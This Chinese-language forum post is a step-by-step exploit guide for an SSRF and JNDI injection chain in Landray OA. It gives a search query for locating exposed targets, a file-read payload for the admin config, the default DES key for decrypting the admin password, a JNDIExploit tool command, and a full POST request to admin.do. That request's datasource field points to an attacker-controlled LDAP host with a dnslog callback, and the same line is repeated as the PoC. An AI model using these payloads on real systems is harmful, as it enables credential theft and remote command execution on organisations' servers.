佚名
发布于 IP属地北京

【漏洞左先锋】【OA漏洞】蓝凌OA SSRF+JNDI注入漏洞

漏洞详情

蓝凌OA 存在SSRF+JNDI注入漏洞,攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限件。

影响版本

蓝凌OA

漏洞复现

网络空间测绘平台语句
app="Landray-OA系统"
访问目标进行测试

利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件

/WEB-INF/KmssConfig/admin.properties
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获得password,由于蓝凌OA默认是DES加密,且默认密钥为 kmssAdminKey,所以只要拿着password进行解密就好(返回的password字符串去掉末尾的/r在进行解密)


成功进入后台

进入后台后,使用工具执行命令

java -jar JNDIExploit-1.4-SNAPSHOT.jar [-i]  [address][-l] [port] 

https://github.com/WhiteHSBG/JNDIExploit
运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)

POST /admin.do HTTP/1.1
Host: 
Content-Length: 91
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http:// 127.0.0.1:8088
Referer: http://127.0.0.1:8088/admin.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=19C56D56A10068F34009D39C1C7FC35F
Connection: close

method=testDbConn&datasource=ldap://xx.xx.xx.xx:80/Basic/Dnslog/40fd5ef2.dns.1433.eu.org

Poc

method=testDbConn&datasource=ldap://xx.xx.xx.xx:80/Basic/Dnslog/40fd5ef2.dns.1433.eu.org

参考文章

https://www.adminxe.com/2420.html

浏览 (1158)
点赞 (4)
收藏
打赏
评论